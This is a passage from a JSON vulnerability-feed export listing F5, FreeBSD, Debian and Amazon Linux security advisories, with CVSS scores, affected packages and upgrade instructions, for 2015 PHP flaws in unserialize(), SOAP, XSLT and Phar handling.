the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. 
If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products over a secure network and limit access to only trusted users. For more information about securing access to BIG-IP/Enterprise Manager systems, refer to [K13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x)](<https://support.f5.com/csp/article/K13309>) and [K13092: Overview of securing access to the BIG-IP system](<https://support.f5.com/csp/article/K13092>).\n\nAdditionally, you should avoid any customization of PHP files on the affected F5 products.\n\n * [K9970: Subscribing to email notifications regarding F5 products](<https://support.f5.com/csp/article/K9970>)\n * [K9957: Creating a custom RSS feed to view new and updated documents](<https://support.f5.com/csp/article/K9957>)\n * [K4602: Overview of the F5 security vulnerability response policy](<https://support.f5.com/csp/article/K4602>)\n * [K4918: Overview of the F5 critical issue hotfix policy](<https://support.f5.com/csp/article/K4918>)\n * [K167: Downloading software and firmware from F5](<https://support.f5.com/csp/article/K167>)\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-08T10:11:00", "type": "f5", "title": "PHP vulnerabilities CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, and CVE-2015-6838", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, 
"obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2017-04-06T16:51:00", "id": "F5:K17377", "href": "https://support.f5.com/csp/article/K17377", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-06-08T18:49:01", "description": "Vulnerability Recommended Actions\n\nIf you are running a version listed in the **Versions known to be vulnerable** column, you can eliminate this vulnerability by upgrading to a version listed in the **Versions known to be not vulnerable** column. If the table lists only an older version than what you are currently running, or does not list a non-vulnerable version, then no upgrade candidate currently exists.\n\nMitigation\n\nTo mitigate this vulnerability, you should permit management access to F5 products over a secure network and limit access to only trusted users. 
For more information about securing access to BIG-IP/Enterprise Manager systems, refer to SOL13309: Restricting access to the Configuration utility by source IP address (11.x - 12.x) and SOL13092: Overview of securing access to the BIG-IP system.\n\nAdditionally, you should avoid any customization of PHP files on the affected F5 products.\n\nSupplemental Information\n\n * SOL9970: Subscribing to email notifications regarding F5 products\n * SOL9957: Creating a custom RSS feed to view new and updated documents\n * SOL4602: Overview of the F5 security vulnerability response policy\n * SOL4918: Overview of the F5 critical issue hotfix policy\n * SOL167: Downloading software and firmware from F5\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-10-08T00:00:00", "type": "f5", "title": "SOL17377 - PHP vulnerabilities CVE-2015-6834, CVE-2015-6835, CVE-2015-6836, CVE-2015-6837, and CVE-2015-6838", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6835", "CVE-2015-6838"], "modified": "2016-11-08T00:00:00", "id": "SOL17377", "href": 
"http://support.f5.com/kb/en-us/solutions/public/17000/300/sol17377.html", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2022-01-19T15:51:32", "description": "\n\nPHP reports:\n\nCore:\n\t \nFixed bug #70172 (Use After Free Vulnerability in unserialize()).\nFixed bug #70219 (Use after free vulnerability in session deserializer).\n\nEXIF:\n\t \nFixed bug #70385 (Buffer over-read in exif_read_data with TIFF IFD tag byte value of 32 bytes).\n\nhash:\n\t \nFixed bug #70312 (HAVAL gives wrong hashes in specific cases).\n\nPCRE:\n\t \nFixed bug #70345 (Multiple vulnerabilities related to PCRE functions).\n\nSOAP:\n\t \nFixed bug #70388 (SOAP serialize_function_call() type confusion / RCE).\n\nSPL:\n\t \nFixed bug #70365 (Use-after-free vulnerability in unserialize() with SplObjectStorage).\nFixed bug #70366 (Use-after-free vulnerability in unserialize() with SplDoublyLinkedList).\n\nXSLT:\n\t \nFixed bug #69782 (NULL pointer dereference).\n\nZIP:\n\t \nFixed bug #70350 (ZipArchive::extractTo allows for directory traversal when creating directories).\n\n\n\n\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-03T00:00:00", "type": "freebsd", "title": "php -- multiple vulnerabilities", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 
7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-08T00:00:00", "id": "3D675519-5654-11E5-9AD8-14DAE9D210B8", "href": "https://vuxml.freebsd.org/freebsd/3d675519-5654-11e5-9ad8-14dae9d210b8.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "debian": [{"lastseen": "2021-10-21T22:45:00", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3358-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 13, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2015-6834 CVE-2015-6835 CVE-2015-6836 CVE-2015-6837 \n CVE-2015-6838\n\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. 
Please\nrefer to the upstream changelog for more information:\n\n https://php.net/ChangeLog-5.php#5.4.45\n https://php.net/ChangeLog-5.php#5.6.13\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.45-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-13T14:58:00", "type": "debian", "title": "[SECURITY] [DSA 3358-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-13T14:58:00", "id": "DEBIAN:DSA-3358-1:3BA72", "href": "https://lists.debian.org/debian-security-announce/2015/msg00257.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, 
{"lastseen": "2022-01-29T01:05:39", "description": "- -------------------------------------------------------------------------\nDebian Security Advisory DSA-3358-1 security@debian.org\nhttps://www.debian.org/security/ Salvatore Bonaccorso\nSeptember 13, 2015 https://www.debian.org/security/faq\n- -------------------------------------------------------------------------\n\nPackage : php5\nCVE ID : CVE-2015-6834 CVE-2015-6835 CVE-2015-6836 CVE-2015-6837 \n CVE-2015-6838\n\nSeveral vulnerabilities were found in PHP, a general-purpose scripting\nlanguage commonly used for web application development.\n\nThe vulnerabilities are addressed by upgrading PHP to new upstream\nversions (5.4.45 and 5.6.13), which include additional bug fixes. Please\nrefer to the upstream changelog for more information:\n\n https://php.net/ChangeLog-5.php#5.4.45\n https://php.net/ChangeLog-5.php#5.6.13\n\nFor the oldstable distribution (wheezy), these problems have been fixed\nin version 5.4.45-0+deb7u1.\n\nFor the stable distribution (jessie), these problems have been fixed in\nversion 5.6.13+dfsg-0+deb8u1.\n\nWe recommend that you upgrade your php5 packages.\n\nFurther information about Debian Security Advisories, how to apply\nthese updates to your system and frequently asked questions can be\nfound at: https://www.debian.org/security/\n\nMailing list: debian-security-announce@lists.debian.org", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-09-13T14:58:00", "type": "debian", "title": "[SECURITY] [DSA 3358-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", 
"exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2015-09-13T14:58:00", "id": "DEBIAN:DSA-3358-1:5263D", "href": "https://lists.debian.org/debian-security-announce/2015/msg00257.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-10-23T22:20:54", "description": "Package : php5\nVersion : 5.3.3.1-7+squeeze28\nCVE ID : CVE-2015-6831 CVE-2015-6832 CVE-2015-6833 CVE-2015-6834\n CVE-2015-6836 CVE-2015-6837 CVE-2015-6838 CVE-2015-7803\n CVE-2015-7804\n\n * CVE-2015-6831\n Use after free vulnerability was found in unserialize() function.\n We can create ZVAL and free it via Serializable::unserialize.\n However the unserialize() will still allow to use R: or r: to set\n references to that already freed memory. It is possible to\n use-after-free attack and execute arbitrary code remotely.\n * CVE-2015-6832\n Dangling pointer in the unserialization of ArrayObject items.\n * CVE-2015-6833\n Files extracted from archive may be placed outside of destination\n directory\n * CVE-2015-6834\n Use after free vulnerability was found in unserialize() function.\n We can create ZVAL and free it via Serializable::unserialize.\n However the unserialize() will still allow to use R: or r: to set\n references to that already freed memory. 
This makes a\n use-after-free attack and remote execution of arbitrary code possible.\n * CVE-2015-6836\n A type confusion occurs within SOAP serialize_function_call due\n to insufficient validation of the headers field.\n In the SoapClient's __call method, the verify_soap_headers_array\n check is applied only to headers retrieved from\n zend_parse_parameters; the problem is that a few lines later,\n soap_headers could be updated or even replaced with values from\n the __default_headers object fields.\n * CVE-2015-6837\n The XSLTProcessor class misses a few checks on the input from the\n libxslt library. The valuePop() function call can return a\n NULL pointer, and PHP does not check for that.\n * CVE-2015-6838\n The XSLTProcessor class misses a few checks on the input from the\n libxslt library. The valuePop() function call can return a\n NULL pointer, and PHP does not check for that.\n * CVE-2015-7803\n A NULL pointer dereference flaw was found in the way PHP's Phar\n extension parsed Phar archives. 
A specially crafted archive could\n cause PHP to crash.\n * CVE-2015-7804\n An uninitialized pointer use flaw was found in the\n phar_make_dirstream() function of PHP's Phar extension.\n A specially crafted phar file in the ZIP format with a directory\n entry with a file name \"/ZIP\" could cause a PHP application\n function to crash.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2015-11-08T18:51:20", "type": "debian", "title": "[SECURITY] [DLA 341-1] php5 security update", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6831", "CVE-2015-6832", "CVE-2015-6833", "CVE-2015-6834", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838", "CVE-2015-7803", "CVE-2015-7804"], "modified": "2015-11-08T18:51:20", "id": "DEBIAN:DLA-341-1:DA682", "href": "https://lists.debian.org/debian-lts-announce/2015/11/msg00002.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "amazon": [{"lastseen": "2021-07-25T19:28:39", "description": "**Issue Overview:**\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. 
An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838)\n\nA flaw was discovered in the way PHP performed object unserialization. Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-6834, CVE-2015-6835, CVE-2015-6836)\n\n \n**Affected Packages:** \n\n\nphp54\n\n \n**Issue Correction:** \nRun _yum update php54_ to update your system. \n\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php54-xml-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-enchant-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-recode-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mysqlnd-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-tidy-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-bcmath-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mcrypt-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-cli-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-xmlrpc-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-dba-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-devel-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-intl-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pgsql-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mbstring-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-process-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-gd-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pdo-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-embedded-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mssql-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-soap-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-debuginfo-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-mysql-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 
php54-snmp-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-fpm-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-pspell-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-imap-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-odbc-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-ldap-5.4.45-1.75.amzn1.i686 \n \u00a0\u00a0\u00a0 php54-common-5.4.45-1.75.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php54-5.4.45-1.75.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php54-debuginfo-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-recode-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-dba-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pspell-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-process-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-devel-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-enchant-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-imap-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-intl-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mssql-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mysql-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pdo-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-common-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mysqlnd-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mcrypt-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-snmp-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-xml-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-embedded-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-gd-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-mbstring-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-tidy-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-bcmath-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-soap-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-odbc-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 
php54-ldap-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-fpm-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-cli-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-pgsql-5.4.45-1.75.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php54-xmlrpc-5.4.45-1.75.amzn1.x86_64 \n \n \n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2016-03-16T16:30:00", "type": "amazon", "title": "Low: php54", "bulletinFamily": "unix", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-6834", "CVE-2015-6835", "CVE-2015-6836", "CVE-2015-6837", "CVE-2015-6838"], "modified": "2016-03-16T16:30:00", "id": "ALAS-2016-670", "href": "https://alas.aws.amazon.com/ALAS-2016-670.html", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-09-27T19:37:07", "description": "**Issue Overview:**\n\nAs <a href=\"https://bugs.php.net/bug.php?id=69720\">reported upstream</a>, A NULL pointer dereference flaw was found in the way PHP's Phar extension parsed Phar archives. A specially crafted archive could cause PHP to crash. (CVE-2015-7803 )\n\nA flaw was discovered in the way PHP performed object unserialization. 
Specially crafted input processed by the unserialize() function could cause a PHP application to crash or, possibly, execute arbitrary code. (CVE-2015-6834, CVE-2015-6835, CVE-2015-6836)\n\nA NULL pointer dereference flaw was found in the XSLTProcessor class in PHP. An attacker could use this flaw to cause a PHP application to crash if it performed Extensible Stylesheet Language (XSL) transformations using untrusted XSLT files and allowed the use of PHP functions to be used as XSLT functions within XSL stylesheets. (CVE-2015-6837, CVE-2015-6838)\n\nAs <a href=\"https://bugs.php.net/bug.php?id=70433\">reported upstream</a>, an uninitialized pointer use flaw was found in the phar_make_dirstream() function of PHP's Phar extension. A specially crafted phar file in the ZIP format with a directory entry with a file name \"/ZIP\" could cause a PHP application function to crash. (CVE-2015-7804)\n\n \n**Affected Packages:** \n\n\nphp56\n\n \n**Issue Correction:** \nRun _yum update php56_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n \u00a0\u00a0\u00a0 php56-xmlrpc-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-xml-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-odbc-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-imap-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-pdo-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-debuginfo-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-gmp-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mcrypt-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-dba-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-tidy-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-enchant-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-opcache-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-common-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-devel-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-fpm-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mssql-5.6.14-1.119.amzn1.i686 \n 
\u00a0\u00a0\u00a0 php56-pspell-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-snmp-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-process-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-cli-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mysqlnd-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-ldap-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-gd-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-intl-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-embedded-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-dbg-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-bcmath-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-soap-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-pgsql-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-recode-5.6.14-1.119.amzn1.i686 \n \u00a0\u00a0\u00a0 php56-mbstring-5.6.14-1.119.amzn1.i686 \n \n src: \n \u00a0\u00a0\u00a0 php56-5.6.14-1.119.amzn1.src \n \n x86_64: \n \u00a0\u00a0\u00a0 php56-intl-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-process-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-xml-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-common-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-xmlrpc-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-recode-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-snmp-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-ldap-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-debuginfo-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mssql-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mysqlnd-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-soap-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-mcrypt-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-enchant-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-devel-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 php56-pgsql-5.6.14-1.119.amzn1.x86_64 \n \u00a0\u00a0\u00a0 
